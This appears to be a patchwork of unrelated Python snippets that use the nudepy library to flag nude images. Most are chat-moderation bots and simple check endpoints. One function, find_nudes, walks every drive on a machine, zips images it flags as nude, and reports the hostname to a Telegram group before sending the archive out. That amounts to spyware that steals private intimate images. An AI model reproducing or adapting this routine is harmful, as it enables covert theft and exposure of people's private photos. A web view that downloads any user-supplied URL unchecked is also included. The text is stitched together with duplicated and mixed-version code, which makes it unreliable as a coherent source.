async def is_nsfw(event):
    lmao = event
    if not (lmao.gif or lmao.video or lmao.video_note or lmao.photo or lmao.sticker or lmao.media):
        return False
    starkstark = None
    if lmao.video or lmao.video_note or lmao.sticker or lmao.gif:
        # For video-like media and stickers, only the thumbnail is downloaded.
        try:
            starkstark = await event.client.download_media(lmao.media, thumb=-1)
        except:
            return False
    elif lmao.photo:
        try:
            starkstark = await event.client.download_media(lmao.photo)
        except:
            return False
    if starkstark is None:
        # Media type that cannot be analysed (e.g. a plain document).
        return False
    img = starkstark
    # Remove the downloaded file before returning; the original put os.remove after return,
    # which made the cleanup unreachable.
    is_nsfw = nude.is_nude(img)
    os.remove(img)
    return is_nsfw
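# Hedged usage sketch (not from the source): how a handler might call is_nsfw above,
# assuming a Telethon client object named `client`.
from telethon import events

@client.on(events.NewMessage())
async def _nsfw_watchdog(event):
    if await is_nsfw(event):
        await event.delete()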
def NudeChecker(self, args):
    nude_counter = 0
    other_counter = 0
    picture_path = './carved_content/pictures/'
    nude_path = './carved_content/pictures/nude/'
    pictures = []
    temp_pictures = [
        f for f in os.listdir(picture_path)
        if os.path.isfile(os.path.join(picture_path, f))
    ]
    for temp_picture in temp_pictures:
        if temp_picture.endswith('.jpg') or temp_picture.endswith('.jpeg'):
            pictures.append(picture_path + temp_picture)
    for picture in pictures:
        try:
            if nude.is_nude(picture) is True:
                # Move detected pictures into the nude/ subdirectory.
                # (str.split replaces the Python 2-only string.split helper.)
                tmp_picture = nude_path + picture.split('/')[-1]
                os.rename(picture, tmp_picture)
                nude_counter += 1
            else:
                other_counter += 1
        except:
            pass
    return nude_counter, other_counter
async def del_profanity(event):
    if event.is_private:
        return
    msg = str(event.text)
    sender = await event.get_sender()
    if await is_admin(event, event.message.sender_id):
        return
    chats = spammers.find({})
    for c in chats:
        if event.text:
            if event.chat_id == c["id"]:
                if better_profanity.profanity.contains_profanity(msg):
                    await event.delete()
                    if sender.username is None:
                        st = sender.first_name
                        hh = sender.id
                        final = f"[{st}](tg://user?id={hh}) **{msg}** is detected as a slang word and your message has been deleted"
                    else:
                        final = f"Sir, **{msg}** is detected as a slang word and your message has been deleted"
                    dev = await event.respond(final)
                    await asyncio.sleep(10)
                    await dev.delete()
        if event.photo:
            if event.chat_id == c["id"]:
                await event.client.download_media(event.photo, "nudes.jpg")
                if nude.is_nude("./nudes.jpg"):
                    await event.delete()
                    st = sender.first_name
                    hh = sender.id
                    final = (
                        f"**NSFW DETECTED**\n\n[{st}](tg://user?id={hh}) your message contains NSFW content, so Shasa deleted it.\n\n"
                        f"**NSFW sender (user/bot):** [{st}](tg://user?id={hh})\n\n"
                        "`⚔️ Automatic detections powered by ShasaAI`\n**#GROUP_GUARDIAN**"
                    )
                    dev = await event.respond(final)
                    await asyncio.sleep(10)
                    await dev.delete()
                os.remove("nudes.jpg")
def response_view(request):
    src = request.GET.get('src', 'KeyError')
    if src == 'KeyError':
        return HttpResponse('Improper Request')
    print(f'Got {src}')
    # return HttpResponse(src)
    val = download(src)
    print('download complete')
    if val:
        print('checking')
        status = nude.is_nude(os.path.join(BASE_DIR, 'img'))
        return HttpResponse(str(status))
    else:
        return HttpResponse('failure')
def find_nudes():
    # Use the global counters.
    global files_founded
    global nudes_founded
    # Create the zip archive.
    z = zipfile.ZipFile(zipado, "w")
    # Find every partition on the machine.
    partitions = find_partitions()
    # Search for nudes partition by partition, file by file.
    for drive in partitions:
        print "Searching for nudes in " + drive
        # Report over the Telegram bot when the search starts on a drive.
        bot.sendMessage(group_id, hostname + ' - Searching for nudes in ' + drive)
        for root, dirs, files in os.walk(drive):
            for file_n in files:
                # Count every file visited.
                files_founded = files_founded + 1
                in_filename = os.path.join(root, file_n)
                print in_filename
                if file_n.endswith(extensions):
                    # Skip the Windows folder, since scanning it takes too long.
                    if 'Windows' not in in_filename:
                        print 'Checking nude...'
                        # Run the nudity check.
                        try:
                            if nude.is_nude(in_filename) is True:
                                print '[Nude found]'
                                print '[Saving]'
                                # Add the matched file to the zip archive created above.
                                z.write(in_filename)
                                print '[Saved]'
                                # Increment the nude counter.
                                nudes_founded = nudes_founded + 1
                        except:
                            pass
        # Send a report for each partition.
        bot.sendMessage(
            group_id, hostname + '\nFiles found: ' + str(files_founded) +
            '\nNudes found: ' + str(nudes_founded))
        # Reset the counters.
        nudes_founded = 0
        files_founded = 0
    # After scanning every partition, close the zip archive.
    z.close()
    # Send the zip archive that was created.
    send_nudes()
def main(url):
    x = nude.is_nude(url)
    # n = Nude('examples/images/test2.jpg')
    # n.parse()
    # print("Nudity result :", n.result, n.inspect())
    print(x)
    # Opening with 'w' already truncates the file, so the separate r+/truncate() pass was removed.
    with open('data.txt', 'w') as outfile:
        outfile.write(str(x))
    return 1
def analyze_tweets(tweets, pictures=False):
    analysis = {}
    for tweet in tweets:
        try:
            analysis[tweet.id] = analyze(tweet.text)
            if pictures:
                media_files = tweet.entities.get("media", [])
                for file in media_files:
                    filename = wget.download(file["media_url"])
                    if is_nude(str(filename)):
                        analysis[tweet.id] = "bad image"
                        break
                os.system('rm *.jpg *.png')
        except:
            analysis[tweet.id] = "none"
            media_files = tweet.entities.get("media", [])
            for file in media_files:
                filename = wget.download(file["media_url"])
                if is_nude(str(filename)):
                    analysis[tweet.id] = "bad image"
                    break
            os.system('rm *.jpg')
    return analysis
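# Hedged refactor sketch (an assumption, not part of the source): the media check above is
# repeated in both branches and could be factored into a helper such as this one.
def _tweet_has_bad_image(tweet):
    for media in tweet.entities.get("media", []):
        filename = wget.download(media["media_url"])
        if is_nude(str(filename)):
            return True
    return False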
def save_pics(self, urls, sid):
    image_box = []
    for index, url in enumerate(urls):
        url = url if "http" in url else urljoin(f"http://{self.domain}", url)
        info(f"---fetch pic[{index}]:{url}")
        path = f"{self.screenpath}/{sid}_{index}.png"
        current_image = None
        with open(path, "wb") as file:
            current_image = self.get_pic(url)
            file.write(current_image)
        success(f"image saved: {path}")
        if Config.no_porn_img and nude.is_nude(path):
            warning("nude detected")
            continue
        image_box.append(BytesIO(current_image))
    return image_box
async def del_profanity(event):
    if event.is_private:
        return
    if MONGO_DB_URI is None:
        return
    msg = str(event.text)
    sender = await event.get_sender()
    let = sender.username
    if event.is_group:
        if await is_register_admin(event.input_chat, event.message.sender_id):
            return
    chats = spammers.find({})
    for c in chats:
        if event.text:
            if event.chat_id == c['id']:
                if better_profanity.profanity.contains_profanity(msg):
                    await event.delete()
                    if sender.username is None:
                        st = sender.first_name
                        hh = sender.id
                        final = f"[{st}](tg://user?id={hh}) **{msg}** is detected as a slang word and your message has been deleted"
                    else:
                        final = f'@{let} **{msg}** is detected as a slang word and your message has been deleted'
                    dev = await event.respond(final)
                    await asyncio.sleep(10)
                    await dev.delete()
        if event.photo:
            if event.chat_id == c['id']:
                await event.client.download_media(event.photo, "nudes.jpg")
                if nude.is_nude('./nudes.jpg'):
                    await event.delete()
                    if sender.username is None:
                        st = sender.first_name
                        hh = sender.id
                        final = f"[{st}](tg://user?id={hh}) your message has been deleted due to pornographic content"
                    else:
                        final = f'@{let} your message has been deleted due to pornographic content'
                    dev = await event.respond(final)
                    await asyncio.sleep(10)
                    await dev.delete()
                os.remove("nudes.jpg")
async def ws(event):
    warner_starkz = get_all_nsfw_enabled_chat()
    if len(warner_starkz) == 0:
        return
    if not is_nsfwatch_indb(str(event.chat_id)):
        return
    if not event.photo:
        return
    if not await is_admin(event, BOT_ID):
        return
    if await is_admin(event, event.message.sender_id):
        return
    sender = await event.get_sender()
    await event.client.download_media(event.photo, "nudes.jpg")
    if nude.is_nude("./nudes.jpg"):
        await event.delete()
        st = sender.first_name
        hh = sender.id
        final = (
            f"**NSFW DETECTED**\n\n[{st}](tg://user?id={hh}) your message contains NSFW content, so Shasa deleted it.\n\n"
            f"**NSFW sender (user/bot):** [{st}](tg://user?id={hh})\n\n"
            "`⚔️ Automatic detections powered by ShasaAI`\n**#GROUP_GUARDIAN**"
        )
        dev = await event.respond(final)
        await asyncio.sleep(10)
        await dev.delete()
    os.remove("nudes.jpg")
# coding:utf-8
"""
Skin-color-based nude image detection.
"""
import nude
from nude import Nude

print(nude.is_nude('datas/images/test2.jpg'))

n = Nude('datas/images/test2.jpg')
n.parse()
print("damita :", n.result, n.inspect())
def get_nude(image_path):
    return nude.is_nude(image_path)
def nude_yesorno(num):
    try:
        res = nude.is_nude(str(num) + '.jpg')
        return res
    except:
        return False
def isItNude():
    imageFile = request.files['image']
    filename = secure_filename(imageFile.filename)
    filePath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
    imageFile.save(filePath)
    return jsonify({"result": nude.is_nude(filePath)})
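# Hedged usage sketch (not from the source): exercising isItNude through Flask's test
# client, assuming the view is registered on the Flask app `app` at a hypothetical
# POST route "/is-it-nude"; adjust the path to the real route.
with app.test_client() as client:
    with open("sample.jpg", "rb") as fh:
        resp = client.post("/is-it-nude", data={"image": (fh, "sample.jpg")})
    print(resp.get_json())  # e.g. {"result": false}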
def is_nsfw(request, url):
    urllib.request.urlretrieve(url, "test.jpg")
    return nude.is_nude('test.jpg')
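# Hedged variant (an assumption, not from the source): downloading to a unique temporary
# file instead of a fixed "test.jpg" avoids collisions between concurrent requests and
# cleans up after itself.
import os
import tempfile
import urllib.request

import nude


def is_nsfw_tempfile(url):
    fd, path = tempfile.mkstemp(suffix=".jpg")
    os.close(fd)
    try:
        urllib.request.urlretrieve(url, path)
        return nude.is_nude(path)
    finally:
        os.remove(path)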
def nude_yesorno(num):
    res = nude.is_nude(str(num) + '.jpg')
    return res
def TaNu(self, path, filename):
    nu = nude.is_nude(os.path.join(path, filename))
    if nu:
        # Prefix files flagged as nude with [NUDE] and rename them in place.
        name, ext = os.path.splitext(filename)
        new_name = '[NUDE]' + name + ext
        os.rename(os.path.abspath(os.path.join(path, filename)),
                  os.path.abspath(os.path.join(path, new_name)))
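# Hedged usage sketch (not from the source): assuming TaNu is a method of some scanner
# class, here called Scanner purely for illustration, tag every file in a directory.
scanner = Scanner()
for fname in os.listdir("photos"):
    if os.path.isfile(os.path.join("photos", fname)):
        scanner.TaNu("photos", fname)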
import nude  # pip install --upgrade nudepy

print(nude.is_nude('data/women.jpg'))

n = nude.Nude('data/women.jpg')
n.parse()
print("damita :", n.result, n.inspect())
import nude
from nude import Nude

print(nude.is_nude('images.jpg'))

m = Nude('img.webp')
m.parse()
print("damita_1 :", m.result, m.inspect())

n = Nude('images2.jpg')
n.parse()
print("damita_2 :", n.result, n.inspect())
import nude
from nude import Nude

x = nude.is_nude('assets/nsfw/nude/03.png')
print(x)
if x:
    print('This is a nude')
else:
    print('no')